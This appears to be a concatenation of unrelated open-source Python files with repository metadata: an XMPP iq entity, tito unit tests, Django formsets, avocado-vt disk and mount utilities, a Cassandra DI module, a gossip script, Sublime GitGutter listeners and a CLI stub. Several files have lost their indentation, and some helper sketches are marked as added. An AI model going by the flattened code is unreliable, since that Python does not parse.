if self.to:
attribs["to"] = self.to
elif self._from:
attribs["from"] = self._from
return self._createProtocolTreeNode(attribs, None, data = None)
def __str__(self):
out = "Iq:\n"
out += "ID: %s\n" % self._id
out += "Type: %s\n" % self._type
if self.xmlns:
out += "xmlns: %s\n" % self.xmlns
if self.to:
out += "to: %s\n" % self.to
elif self._from:
out += "from: %s\n" % self._from
return out
@staticmethod
def fromProtocolTreeNode(node):
return IqProtocolEntity(
node.getAttributeValue("xmlns"),
node.getAttributeValue("id"),
node.getAttributeValue("type"),
node.getAttributeValue("to"),
node.getAttributeValue("from")
)
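# Illustrative sketch (not part of the original module): round-tripping a
# "get" iq through its tree-node form. The xmlns and jid values below are
# made-up examples.
def _example_iq_roundtrip():
    iq = IqProtocolEntity(xmlns="w:profile:picture",
                          _type=IqProtocolEntity.TYPE_GET,
                          to="123456789@s.whatsapp.net")
    node = iq.toProtocolTreeNode()
    return IqProtocolEntity.fromProtocolTreeNode(node)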
|
AragurDEV/yowsup
|
yowsup/layers/protocol_iq/protocolentities/iq.py
|
Python
|
gpl-3.0
| 2,304 | 0.010417 |
import unittest
from tito.buildparser import BuildTargetParser
from ConfigParser import ConfigParser
from tito.exception import TitoException
class BuildTargetParserTests(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.valid_branches = ["branch1", "branch2"]
self.release_target = "project-x.y.z"
self.releasers_config = ConfigParser()
self.releasers_config.add_section(self.release_target)
self.releasers_config.set(self.release_target, "build_targets",
"branch1:project-x.y.z-candidate")
def test_parser_gets_correct_targets(self):
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
release_targets = parser.get_build_targets()
self.assertTrue("branch1" in release_targets)
self.assertEqual("project-x.y.z-candidate", release_targets["branch1"])
self.assertFalse("branch2" in release_targets)
def test_invalid_branch_raises_exception(self):
self.releasers_config.set(self.release_target, "build_targets",
"invalid-branch:project-x.y.z-candidate")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
self.assertRaises(TitoException, parser.get_build_targets)
def test_missing_semicolon_raises_exception(self):
self.releasers_config.set(self.release_target, "build_targets",
"invalid-branchproject-x.y.z-candidate")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
self.assertRaises(TitoException, parser.get_build_targets)
def test_empty_branch_raises_exception(self):
self.releasers_config.set(self.release_target, "build_targets",
":project-x.y.z-candidate")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
self.assertRaises(TitoException, parser.get_build_targets)
def test_empty_target_raises_exception(self):
self.releasers_config.set(self.release_target, "build_targets",
"branch1:")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
self.assertRaises(TitoException, parser.get_build_targets)
def test_multiple_spaces_ok(self):
self.releasers_config.set(self.release_target, "build_targets",
" branch1:project-x.y.z-candidate ")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
release_targets = parser.get_build_targets()
self.assertEqual(1, len(release_targets))
self.assertTrue("branch1" in release_targets)
self.assertEqual("project-x.y.z-candidate", release_targets["branch1"])
def test_multiple_branches_supported(self):
self.releasers_config.set(self.release_target, "build_targets",
"branch1:project-x.y.z-candidate branch2:second-target")
parser = BuildTargetParser(self.releasers_config, self.release_target,
self.valid_branches)
release_targets = parser.get_build_targets()
self.assertEquals(2, len(release_targets))
self.assertTrue("branch1" in release_targets)
self.assertEqual("project-x.y.z-candidate", release_targets["branch1"])
self.assertTrue("branch2" in release_targets)
self.assertEqual("second-target", release_targets['branch2'])
|
domcleal/tito
|
test/unit/test_build_target_parser.py
|
Python
|
gpl-2.0
| 3,872 | 0.000517 |
from django.forms.formsets import BaseFormSet, formset_factory
from django.forms.models import BaseModelFormSet
from django.forms.models import modelformset_factory
from django import forms
from models import PlanillaHistoricas, ConceptosFolios, Folios, Tomos
class PlanillaHistoricasForm(forms.Form):
codi_empl_per = forms.CharField(max_length=50, widget=forms.TextInput(attrs={'class': 'nombre', 'placeholder': 'Apellidos y Nombres'}))
desc_plan_stp = forms.CharField(max_length=200, widget=forms.Textarea(attrs={'rows': 1}))
def __init__(self, concepto, *args, **kwargs):
super(PlanillaHistoricasForm, self).__init__(*args, **kwargs)
campos = dict()
egr = 'border-color: #e9322d; -webkit-box-shadow: 0 0 6px #f8b9b7; -moz-box-shadow: 0 0 6px #f8b9b7; box-shadow: 0 0 6px #f8b9b7;';
ing = 'border-color: #2D78E9; -webkit-box-shadow: 0 0 6px #2D78E9; -moz-box-shadow: 0 0 6px #2D78E9; box-shadow: 0 0 6px #2D78E9;';
total = 'border-color: rgb(70, 136, 71); -webkit-box-shadow: 0 0 6px rgb(70, 136, 71); -moz-box-shadow: 0 0 6px rgb(70, 136, 71); box-shadow: 0 0 6px rgb(70, 136, 71);';
for conc in concepto:
codigo = conc.codi_conc_tco.codi_conc_tco
descripcion = conc.codi_conc_tco.desc_cort_tco
tipo = conc.codi_conc_tco.tipo_conc_tco
clase = 'remuneraciones' if codigo == 'C373' else 'descuentos' if codigo == 'C374' else 'total' if codigo == 'C12' else 'monto'
attrs = {
'class': clase + ' error',
'data-title': descripcion,
'data-tipo': tipo,
'style': 'width:auto;font-size:15px;' + (ing if tipo == '1' else egr if tipo == '2' else total if codigo in ('C373', 'C12', 'C374') else ''),
'maxlength': 35,
'placeholder': descripcion
}
if codigo in campos:
campos[codigo] += 1
else:
campos[codigo] = 1
index = campos[codigo]
flag = '_%s' % index
self.fields['%s%s' % (codigo, flag)] = forms.CharField(widget=forms.TextInput(attrs=attrs))
self.fields['codigos'] = forms.CharField(max_length=700, widget=forms.HiddenInput())
class BasePlanillaHistoricasFormSet(BaseFormSet):
def __init__(self, *args, **kwargs):
self.concepto = kwargs['concepto']
del kwargs['concepto']
super(BasePlanillaHistoricasFormSet, self).__init__(*args, **kwargs)
def _construct_form(self, i, **kwargs):
kwargs['concepto'] = self.concepto
return super(BasePlanillaHistoricasFormSet, self)._construct_form(i, **kwargs)
def add_fields(self, form, index):
super(BasePlanillaHistoricasFormSet, self).add_fields(form, index)
PlanillaHistoricasFormSet = formset_factory(#form=PlanillaHistoricasForm,
form=PlanillaHistoricasForm,
formset=BasePlanillaHistoricasFormSet,
extra=0, can_delete=False) #exclude=('id', ))
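# Illustrative sketch (not part of the original module): the formset requires
# a "concepto" keyword, which the base formset forwards to every form. The
# queryset argument below is a made-up example.
def _example_formset(concepto_queryset, data=None):
    return PlanillaHistoricasFormSet(data, concepto=concepto_queryset)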
|
heraldmatias/django-payroll
|
src/inei/planilla/forms.py
|
Python
|
gpl-3.0
| 3,110 | 0.006431 |
"""
Virtualization test - Virtual disk related utility functions
:copyright: Red Hat Inc.
"""
import os
import glob
import shutil
import stat
import tempfile
import logging
import re
try:
import configparser as ConfigParser
except ImportError:
import ConfigParser
from avocado.core import exceptions
from avocado.utils import process
from avocado.utils.service import SpecificServiceManager
from virttest import error_context
from virttest.compat_52lts import decode_to_text
# Whether to print all shell commands called
DEBUG = False
def copytree(src, dst, overwrite=True, ignore=''):
"""
Copy dirs from source to target.
:param src: source directory
:param dst: destination directory
:param overwrite: overwrite file if exist or not
:param ignore: files want to ignore
"""
ignore = glob.glob(os.path.join(src, ignore))
for root, dirs, files in os.walk(src):
dst_dir = root.replace(src, dst)
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
for _ in files:
if _ in ignore:
continue
src_file = os.path.join(root, _)
dst_file = os.path.join(dst_dir, _)
if os.path.exists(dst_file):
if overwrite:
os.remove(dst_file)
else:
continue
shutil.copy(src_file, dst_dir)
def is_mount(src, dst=None, fstype=None, options=None, verbose=False,
session=None):
"""
Check is src or dst mounted.
:param src: source device or directory
:param dst: mountpoint, if None will skip to check
:param fstype: file system type, if None will skip to check
    :param options: mount options, separated by ","
:param session: check within the session if given
:return: True if mounted, else return False
"""
mount_str = "%s %s %s" % (src, dst, fstype)
mount_str = mount_str.replace('None', '').strip()
mount_list_cmd = 'cat /proc/mounts'
if session:
mount_result = session.cmd_output_safe(mount_list_cmd)
else:
mount_result = decode_to_text(process.system_output(mount_list_cmd, shell=True))
if verbose:
logging.debug("/proc/mounts contents:\n%s", mount_result)
for result in mount_result.splitlines():
if mount_str in result:
if options:
options = options.split(",")
options_result = result.split()[3].split(",")
for op in options:
if op not in options_result:
if verbose:
logging.info("%s is not mounted with given"
" option %s", src, op)
return False
if verbose:
logging.info("%s is mounted", src)
return True
if verbose:
logging.info("%s is not mounted", src)
return False
def mount(src, dst, fstype=None, options=None, verbose=False, session=None):
"""
    Mount src under dst; if it is already mounted, remount with the given options.
:param src: source device or directory
:param dst: mountpoint
:param fstype: filesystem type need to mount
:param options: mount options
:param session: mount within the session if given
:return: if mounted return True else return False
"""
options = (options and [options] or [''])[0]
if is_mount(src, dst, fstype, options, verbose, session):
if 'remount' not in options:
options = 'remount,%s' % options
cmd = ['mount']
if fstype:
cmd.extend(['-t', fstype])
if options:
cmd.extend(['-o', options])
cmd.extend([src, dst])
cmd = ' '.join(cmd)
if session:
return session.cmd_status(cmd, safe=True) == 0
return process.system(cmd, verbose=verbose) == 0
def umount(src, dst, fstype=None, verbose=False, session=None):
"""
    Unmount src from dst, if src is really mounted under dst.
:param src: source device or directory
:param dst: mountpoint
:param fstype: fstype used to check if mounted as expected
:param session: umount within the session if given
:return: if unmounted return True else return False
"""
mounted = is_mount(src, dst, fstype, verbose=verbose, session=session)
if mounted:
from . import utils_package
package = "psmisc"
# check package is available, if not try installing it
if not utils_package.package_install(package):
logging.error("%s is not available/installed for fuser", package)
fuser_cmd = "fuser -km %s" % dst
umount_cmd = "umount %s" % dst
if session:
session.cmd_output_safe(fuser_cmd)
return session.cmd_status(umount_cmd, safe=True) == 0
process.system(fuser_cmd, ignore_status=True, verbose=True, shell=True)
return process.system(umount_cmd, ignore_status=True, verbose=True) == 0
return True
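# Illustrative sketch (not part of the original module): a typical
# mount -> check -> unmount cycle using the helpers above. The device and
# mountpoint paths are made-up examples.
def _example_mount_cycle():
    src, dst = "/dev/loop0", "/mnt/test"
    if mount(src, dst, fstype="ext4", options="ro", verbose=True):
        assert is_mount(src, dst, fstype="ext4", options="ro")
        umount(src, dst, fstype="ext4")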
@error_context.context_aware
def cleanup(folder):
"""
If folder is a mountpoint, do what is possible to unmount it. Afterwards,
try to remove it.
:param folder: Directory to be cleaned up.
"""
error_context.context(
"cleaning up unattended install directory %s" % folder)
umount(None, folder)
if os.path.isdir(folder):
shutil.rmtree(folder)
@error_context.context_aware
def clean_old_image(image):
"""
Clean a leftover image file from previous processes. If it contains a
mounted file system, do the proper cleanup procedures.
:param image: Path to image to be cleaned up.
"""
error_context.context("cleaning up old leftover image %s" % image)
if os.path.exists(image):
umount(image, None)
os.remove(image)
class Disk(object):
"""
Abstract class for Disk objects, with the common methods implemented.
"""
def __init__(self):
self.path = None
def get_answer_file_path(self, filename):
return os.path.join(self.mount, filename)
def copy_to(self, src):
logging.debug("Copying %s to disk image mount", src)
dst = os.path.join(self.mount, os.path.basename(src))
if os.path.isdir(src):
shutil.copytree(src, dst)
elif os.path.isfile(src):
shutil.copyfile(src, dst)
def close(self):
os.chmod(self.path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
cleanup(self.mount)
logging.debug("Disk %s successfully set", self.path)
class FloppyDisk(Disk):
"""
Represents a floppy disk. We can copy files to it, and setup it in
convenient ways.
"""
@error_context.context_aware
def __init__(self, path, qemu_img_binary, tmpdir, vfd_size):
error_context.context(
"Creating unattended install floppy image %s" % path)
self.mount = tempfile.mkdtemp(prefix='floppy_virttest_', dir=tmpdir)
self.path = path
self.vfd_size = vfd_size
clean_old_image(path)
try:
c_cmd = '%s create -f raw %s %s' % (qemu_img_binary, path,
self.vfd_size)
process.run(c_cmd, verbose=DEBUG)
f_cmd = 'mkfs.msdos -s 1 %s' % path
process.run(f_cmd, verbose=DEBUG)
except process.CmdError as e:
logging.error("Error during floppy initialization: %s" % e)
cleanup(self.mount)
raise
def close(self):
"""
Copy everything that is in the mountpoint to the floppy.
"""
pwd = os.getcwd()
try:
os.chdir(self.mount)
path_list = glob.glob('*')
for path in path_list:
self.copy_to(path)
finally:
os.chdir(pwd)
cleanup(self.mount)
def copy_to(self, src):
logging.debug("Copying %s to floppy image", src)
mcopy_cmd = "mcopy -s -o -n -i %s %s ::/" % (self.path, src)
process.run(mcopy_cmd, verbose=DEBUG)
def _copy_virtio_drivers(self, virtio_floppy):
"""
Copy the virtio drivers on the virtio floppy to the install floppy.
1) Mount the floppy containing the viostor drivers
2) Copy its contents to the root of the install floppy
"""
pwd = os.getcwd()
try:
m_cmd = 'mcopy -s -o -n -i %s ::/* %s' % (
virtio_floppy, self.mount)
process.run(m_cmd, verbose=DEBUG)
finally:
os.chdir(pwd)
def setup_virtio_win2003(self, virtio_floppy, virtio_oemsetup_id):
"""
Setup the install floppy with the virtio storage drivers, win2003 style.
Win2003 and WinXP depend on the file txtsetup.oem file to install
the virtio drivers from the floppy, which is a .ini file.
Process:
1) Copy the virtio drivers on the virtio floppy to the install floppy
2) Parse the ini file with config parser
3) Modify the identifier of the default session that is going to be
executed on the config parser object
4) Re-write the config file to the disk
"""
self._copy_virtio_drivers(virtio_floppy)
txtsetup_oem = os.path.join(self.mount, 'txtsetup.oem')
if not os.path.isfile(txtsetup_oem):
raise IOError('File txtsetup.oem not found on the install '
'floppy. Please verify if your floppy virtio '
'driver image has this file')
parser = ConfigParser.ConfigParser()
parser.read(txtsetup_oem)
if not parser.has_section('Defaults'):
raise ValueError('File txtsetup.oem does not have the session '
'"Defaults". Please check txtsetup.oem')
default_driver = parser.get('Defaults', 'SCSI')
if default_driver != virtio_oemsetup_id:
parser.set('Defaults', 'SCSI', virtio_oemsetup_id)
fp = open(txtsetup_oem, 'w')
parser.write(fp)
fp.close()
def setup_virtio_win2008(self, virtio_floppy):
"""
Setup the install floppy with the virtio storage drivers, win2008 style.
        Win2008, Vista and 7 require the path to the drivers to be specified
        in the unattended file, so we just need to copy the drivers to the
driver floppy disk. Important to note that it's possible to specify
drivers from a CDROM, so the floppy driver copy is optional.
Process:
1) Copy the virtio drivers on the virtio floppy to the install floppy,
if there is one available
"""
if os.path.isfile(virtio_floppy):
self._copy_virtio_drivers(virtio_floppy)
else:
logging.debug(
"No virtio floppy present, not needed for this OS anyway")
class CdromDisk(Disk):
"""
Represents a CDROM disk that we can master according to our needs.
"""
def __init__(self, path, tmpdir):
self.mount = tempfile.mkdtemp(prefix='cdrom_virttest_', dir=tmpdir)
self.tmpdir = tmpdir
self.path = path
clean_old_image(path)
if not os.path.isdir(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
def _copy_virtio_drivers(self, virtio_floppy, cdrom_virtio):
"""
Copy the virtio drivers from floppy and cdrom to install cdrom.
1) Mount the floppy and cdrom containing the virtio drivers
2) Copy its contents to the root of the install cdrom
"""
pwd = os.getcwd()
mnt_pnt = tempfile.mkdtemp(prefix='cdrom_virtio_', dir=self.tmpdir)
mount(cdrom_virtio, mnt_pnt, options='loop,ro', verbose=DEBUG)
try:
copytree(mnt_pnt, self.mount, ignore='*.vfd')
cmd = 'mcopy -s -o -n -i %s ::/* %s' % (virtio_floppy, self.mount)
process.run(cmd, verbose=DEBUG)
finally:
os.chdir(pwd)
umount(None, mnt_pnt, verbose=DEBUG)
os.rmdir(mnt_pnt)
def setup_virtio_win2008(self, virtio_floppy, cdrom_virtio):
"""
Setup the install cdrom with the virtio storage drivers, win2008 style.
        Win2008, Vista and 7 require the path to the drivers to be specified
        in the unattended file, so we just need to copy the drivers to the
extra cdrom disk. Important to note that it's possible to specify
drivers from a CDROM, so the floppy driver copy is optional.
Process:
1) Copy the virtio drivers on the virtio floppy to the install cdrom,
if there is one available
"""
if os.path.isfile(virtio_floppy):
self._copy_virtio_drivers(virtio_floppy, cdrom_virtio)
else:
logging.debug(
"No virtio floppy present, not needed for this OS anyway")
@error_context.context_aware
def close(self):
error_context.context(
"Creating unattended install CD image %s" % self.path)
g_cmd = ('mkisofs -o %s -max-iso9660-filenames '
'-relaxed-filenames -D --input-charset iso8859-1 '
'%s' % (self.path, self.mount))
process.run(g_cmd, verbose=DEBUG)
os.chmod(self.path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
cleanup(self.mount)
logging.debug("unattended install CD image %s successfully created",
self.path)
class CdromInstallDisk(Disk):
"""
Represents a install CDROM disk that we can master according to our needs.
"""
def __init__(self, path, tmpdir, source_cdrom, extra_params):
self.mount = tempfile.mkdtemp(prefix='cdrom_unattended_', dir=tmpdir)
self.path = path
self.extra_params = extra_params
self.source_cdrom = source_cdrom
cleanup(path)
if not os.path.isdir(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
cp_cmd = ('cp -r %s/isolinux/ %s/' % (source_cdrom, self.mount))
listdir = os.listdir(self.source_cdrom)
for i in listdir:
if i == 'isolinux':
continue
os.symlink(os.path.join(self.source_cdrom, i),
os.path.join(self.mount, i))
process.run(cp_cmd)
def get_answer_file_path(self, filename):
return os.path.join(self.mount, 'isolinux', filename)
@error_context.context_aware
def close(self):
error_context.context(
"Creating unattended install CD image %s" % self.path)
if os.path.exists(os.path.join(self.mount, 'isolinux')):
# bootable cdrom
f = open(os.path.join(self.mount, 'isolinux', 'isolinux.cfg'), 'w')
f.write('default /isolinux/vmlinuz append initrd=/isolinux/'
'initrd.img %s\n' % self.extra_params)
f.close()
boot = '-b isolinux/isolinux.bin'
else:
# Not a bootable CDROM, using -kernel instead (eg.: arm64)
boot = ''
m_cmd = ('mkisofs -o %s %s -c isolinux/boot.cat -no-emul-boot '
'-boot-load-size 4 -boot-info-table -f -R -J -V -T %s'
% (self.path, boot, self.mount))
process.run(m_cmd)
os.chmod(self.path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
cleanup(self.mount)
cleanup(self.source_cdrom)
logging.debug("unattended install CD image %s successfully created",
self.path)
class GuestFSModiDisk(object):
"""
class of guest disk using guestfs lib to do some operation(like read/write)
on guest disk:
"""
def __init__(self, disk, backend='direct'):
"""
:params disk: target disk image.
:params backend: let libguestfs creates/connects to backend daemon
by starting qemu directly, or using libvirt to manage
an appliance, running User-Mode Linux, or connecting
to an already running daemon.
'direct', 'appliance', 'libvirt', 'libvirt:null',
'libvirt:URI', 'uml', 'unix:path'.
"""
try:
import guestfs
except ImportError:
install_cmd = "yum -y install python-libguestfs"
try:
process.run(install_cmd)
import guestfs
except Exception:
raise exceptions.TestSkipError('We need python-libguestfs (or '
'the equivalent for your '
'distro) for this particular '
'feature (modifying guest '
'files with libguestfs)')
self.g = guestfs.GuestFS()
self.disk = disk
self.g.add_drive(disk)
self.g.set_backend(backend)
libvirtd = SpecificServiceManager("libvirtd")
libvirtd_status = libvirtd.status()
if libvirtd_status is None:
raise exceptions.TestError('libvirtd: service not found')
if (not libvirtd_status) and (not libvirtd.start()):
raise exceptions.TestError('libvirtd: failed to start')
logging.debug("Launch the disk %s, wait..." % self.disk)
self.g.launch()
def os_inspects(self):
self.roots = self.g.inspect_os()
if self.roots:
return self.roots
else:
return None
def mounts(self):
return self.g.mounts()
def mount_all(self):
        roots = self.os_inspects()
        if roots:
            for root in roots:
                mps = self.g.inspect_get_mountpoints(root)
                # Mount shorter mountpoints first ("/" before "/usr", ...);
                # a key-based sort works on both Python 2 and 3, unlike the
                # old cmp-style sort.
                mps.sort(key=lambda mp: len(mp[0]))
for mp_dev in mps:
try:
msg = "Mount dev '%s' partitions '%s' to '%s'"
logging.info(msg % (root, mp_dev[1], mp_dev[0]))
self.g.mount(mp_dev[1], mp_dev[0])
except RuntimeError as err_msg:
logging.info("%s (ignored)" % err_msg)
else:
raise exceptions.TestError(
"inspect_vm: no operating systems found")
def umount_all(self):
logging.debug("Umount all device partitions")
if self.mounts():
self.g.umount_all()
def read_file(self, file_name):
"""
read file from the guest disk, return the content of the file
:param file_name: the file you want to read.
"""
try:
self.mount_all()
o = self.g.cat(file_name)
if o:
return o
else:
err_msg = "Can't read file '%s', check is it exist?"
raise exceptions.TestError(err_msg % file_name)
finally:
self.umount_all()
def write_to_image_file(self, file_name, content, w_append=False):
"""
Write content to the file on the guest disk.
        When using this method all the original content will be overwritten.
        If you don't want your original data to be overwritten, set
        ``w_append=True``.
:param file_name: the file you want to write
:param content: the content you want to write.
:param w_append: append the content or override
"""
try:
try:
self.mount_all()
if w_append:
self.g.write_append(file_name, content)
else:
self.g.write(file_name, content)
except Exception:
raise exceptions.TestError("write '%s' to file '%s' error!"
% (content, file_name))
finally:
self.umount_all()
def replace_image_file_content(self, file_name, find_con, rep_con):
"""
        Replace content in the file that matches find_con with rep_con.
        Regular expressions are supported.
:param file_name: the file you want to replace
:param find_con: the original content you want to replace.
:param rep_con: the replace content you want.
"""
try:
self.mount_all()
file_content = self.g.cat(file_name)
if file_content:
file_content_after_replace = re.sub(find_con, rep_con,
file_content)
if file_content != file_content_after_replace:
self.g.write(file_name, file_content_after_replace)
else:
err_msg = "Can't read file '%s', check is it exist?"
raise exceptions.TestError(err_msg % file_name)
finally:
self.umount_all()
def close(self):
"""
Explicitly close the guestfs handle.
"""
if self.g:
self.g.close()
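# Illustrative sketch (not part of the original module): reading and patching
# a file inside a guest image. The image path and file name are made-up
# examples.
def _example_guestfs_edit():
    disk = GuestFSModiDisk("/tmp/guest.qcow2")
    try:
        hostname = disk.read_file("/etc/hostname")
        disk.replace_image_file_content("/etc/hostname",
                                        hostname.strip(), "new-host")
    finally:
        disk.close()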
|
lmr/avocado-vt
|
virttest/utils_disk.py
|
Python
|
gpl-2.0
| 21,332 | 0.000281 |
from injector import Module
from cassandra.cqlengine import connection
from cassandra.cluster import Cluster
from cassandra.cqlengine.management import create_keyspace_simple, sync_table, sync_type
from cassandra.cqlengine.usertype import UserType
from ...entities.track_type import TrackType
from cassandra_users_repository import CassandraUsersRepository
from cassandra_spots_repository import CassandraSpotsRepository
from runs.cassandra_runs_repository import CassandraRunsRepository
from cassandra_checkpoint_passes_repository import CassandraCheckpointPassesRepository
from ..repositories_definitions import UsersRepository
from ..repositories_definitions import SpotsRepository
from ..repositories_definitions import RunsRepository
from ..repositories_definitions import CheckpointPassesRepository
class CassandraRepositoriesModule(Module):
def configure(self, binder):
connection.setup(['cassandrahost'], 'biketimer', protocol_version=4)
cluster = Cluster(['cassandrahost'])
session = cluster.connect('biketimer')
users_repository_instance = CassandraUsersRepository(cluster, session)
binder.bind(UsersRepository, to=users_repository_instance)
spots_repository_instance = CassandraSpotsRepository(cluster, session)
binder.bind(SpotsRepository, to=spots_repository_instance)
runs_repository_instance = CassandraRunsRepository(cluster, session)
binder.bind(RunsRepository, to=runs_repository_instance)
checkpoint_passes_repository_instance = CassandraCheckpointPassesRepository(cluster, session)
binder.bind(CheckpointPassesRepository, to=checkpoint_passes_repository_instance)
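# Illustrative sketch (not part of the original module): resolving a bound
# repository through an Injector wired with this module. Usage only; the
# bindings themselves are defined above.
def _example_wiring():
    from injector import Injector
    injector = Injector([CassandraRepositoriesModule()])
    return injector.get(UsersRepository)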
|
jacekdalkowski/bike-timer
|
web-api/biketimerwebapi/db/repositories/cassandra/cassandra_repositories_module.py
|
Python
|
apache-2.0
| 1,685 | 0.005935 |
import sys, math
# **************** Main program *********************************************
def main():
# File IO ###############################################
txt = open("in9.txt", 'r')
N = int (txt.readline())
n = 2 * N
a = [[0 for x in range(1)] for y in range(n)]
# print >> sys.stderr, a
print >> sys.stderr, "N=", N
for line in range (0, N):
x , y = [int(j) for j in txt.readline().split()]
#print >> sys.stderr, '%d %d' % (x, y)
m, n = sortTwo(x, y)
a[m].append(n)
a[n].append(m)
a[m][0] += 1
a[n][0] += 1
print >> sys.stderr, "Done file IO \n \n"
##############################################################
# Init vars-------------------------------------------------
#print >> sys.stderr, a
    while (a[-1]==[0]): # drop redundant trailing [0] entries
a.pop()
relationship = a
n = len(relationship)
print >> sys.stderr, "total nodes:" , n
level = [0] * n # contains level of nodes
# print >> sys.stderr, level
#print >> sys.stderr, "relationship: \n" , relationship
countOne = 0
oneList = []
for elem in range(0, n):
if (relationship[elem][0] == 1):
countOne += 1
oneList.append(elem)
print >> sys.stderr, "countONe:", countOne
# print >> sys.stderr,"oneList:", oneList
print >> sys.stderr, "Done Var init \n \n"
# -------------------------------------------------------------
# Engine ---------------------------------------------------
for i in range(0, countOne):
node = oneList[i]
level[i] = findSingleMaxLength(node, node, oneList, countOne, relationship, n)
# ------------------------------------------------------------
# Report -------------------------------------------------
#---------------------------------------------------------
# No touch area ------------------------------------------
maxi = max(level)
if (maxi % 2 == 0):
ans = maxi / 2
else:
ans = (maxi + 1) / 2
print >> sys.stderr, "Answer:", ans
#*********************** End program ************************************************
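# Worked example (illustrative): for the path graph a-b-c-d-e the longest
# leaf-to-leaf walk is maxi = 4 edges, so starting the rumor at the middle
# node c reaches everyone in ceil(4 / 2) = 2 steps, matching the answer
# formula above.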
def spreadRumorNode(node, relationship, relationship_len): # update relationship and provide bag
bag = []
new_relationship = relationship
if (new_relationship[node][0] > 0):
for bag_elem in range (1, 1 + relationship[node][0]):
node_child = relationship[node][bag_elem]
if (relationship[node_child][0] > 0):
bag.append(node_child)
new_relationship[node][0] = -2
return bag, new_relationship
def spreadRumorOnce(target_list, relationship, relationship_len):
new_target_list = []
new_relationship = relationship
number_of_target = len(target_list)
target_bag = [[] for y in range(number_of_target)]
for i in range(number_of_target):
node = target_list[i]
target_bag[i], new_relationship = spreadRumorNode(node, new_relationship, relationship_len)
new_target_list.extend(target_bag[i])
return new_target_list, new_relationship
def findSingleMaxLength(x, x_pos, oneList, oneList_len, relationship, relationship_len):
new_relationship = relationship
step = -1
try:
i = oneList.index(x)
except ValueError:
return -1 # no match
nowhere_to_go = 0
target_list = [x]
while (nowhere_to_go == 0):
step += 1
target_list, new_relationship = spreadRumorOnce(target_list, new_relationship, relationship_len)
if (target_list == []):
nowhere_to_go = 1
return step
def findMin(a, b):
res = a
if (res > b):
res = b
return res
def sortTwo(a, b):
if (a < b):
x = a
y = b
else:
x = b
y = a
return x, y
main()
|
dannyp11/gossip_network
|
main_v2.py
|
Python
|
gpl-2.0
| 4,267 | 0.023904 |
import time
import sublime
import sublime_plugin
ST3 = int(sublime.version()) >= 3000
if ST3:
from .view_collection import ViewCollection
from .git_gutter_popup import show_diff_popup
else:
from view_collection import ViewCollection
from git_gutter_popup import show_diff_popup
def async_event_listener(EventListener):
if ST3:
async_methods = set([
'on_new',
'on_clone',
'on_load',
'on_pre_save',
'on_post_save',
'on_modified',
'on_selection_modified',
'on_activated',
'on_deactivated',
])
for attr_name in dir(EventListener):
if attr_name in async_methods:
attr = getattr(EventListener, attr_name)
setattr(EventListener, attr_name + '_async', attr)
delattr(EventListener, attr_name)
return EventListener
@async_event_listener
class GitGutterEvents(sublime_plugin.EventListener):
def __init__(self):
self._settings_loaded = False
self.latest_keypresses = {}
# Synchronous
def on_modified(self, view):
if self.settings_loaded() and self.live_mode:
self.debounce(view, 'modified', ViewCollection.add)
def on_clone(self, view):
if self.settings_loaded():
self.debounce(view, 'clone', ViewCollection.add)
def on_post_save(self, view):
if self.settings_loaded():
self.debounce(view, 'post-save', ViewCollection.add)
def on_load(self, view):
if self.settings_loaded() and self.live_mode:
self.debounce(view, 'load', ViewCollection.add)
def on_activated(self, view):
if self.settings_loaded() and self.focus_change_mode:
self.debounce(view, 'activated', ViewCollection.add)
def on_hover(self, view, point, hover_zone):
if hover_zone != sublime.HOVER_GUTTER:
return
# don't let the popup flicker / fight with other packages
if view.is_popup_visible():
return
if not settings.get("enable_hover_diff_popup"):
return
show_diff_popup(view, point, flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY)
# Asynchronous
def debounce(self, view, event_type, func):
if self.non_blocking:
key = (event_type, view.file_name())
this_keypress = time.time()
self.latest_keypresses[key] = this_keypress
def callback():
latest_keypress = self.latest_keypresses.get(key, None)
if this_keypress == latest_keypress:
func(view)
if ST3:
set_timeout = sublime.set_timeout_async
else:
set_timeout = sublime.set_timeout
set_timeout(callback, settings.get("debounce_delay"))
else:
func(view)
# Settings
def settings_loaded(self):
if settings and not self._settings_loaded:
self._settings_loaded = self.load_settings()
return self._settings_loaded
def load_settings(self):
self.live_mode = settings.get('live_mode')
if self.live_mode is None:
self.live_mode = True
self.focus_change_mode = settings.get('focus_change_mode')
if self.focus_change_mode is None:
self.focus_change_mode = True
self.non_blocking = settings.get('non_blocking')
if self.non_blocking is None:
self.non_blocking = True
return True
settings = {}
def plugin_loaded():
global settings
settings = sublime.load_settings('GitGutter.sublime-settings')
if not ST3:
plugin_loaded()
|
natecavanaugh/GitGutter
|
git_gutter_events.py
|
Python
|
mit
| 3,715 | 0.000538 |
# Copyright (c) 2016 Cisco Systems
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import click
from aim import config as aim_cfg
from aim import context
from aim.db import api
from aim.tools.cli.groups import aimcli
@aimcli.aim.group(name='config')
@click.pass_context
def config(ctx):
aim_ctx = context.AimContext(store=api.get_store(expire_on_commit=True))
ctx.obj['manager'] = aim_cfg.ConfigManager(aim_ctx, '')
@config.command(name='update')
@click.argument('host', required=False)
@click.pass_context
def update(ctx, host):
"""Current database version."""
host = host or ''
ctx.obj['manager'].to_db(ctx.obj['conf'], host=host)
@config.command(name='replace')
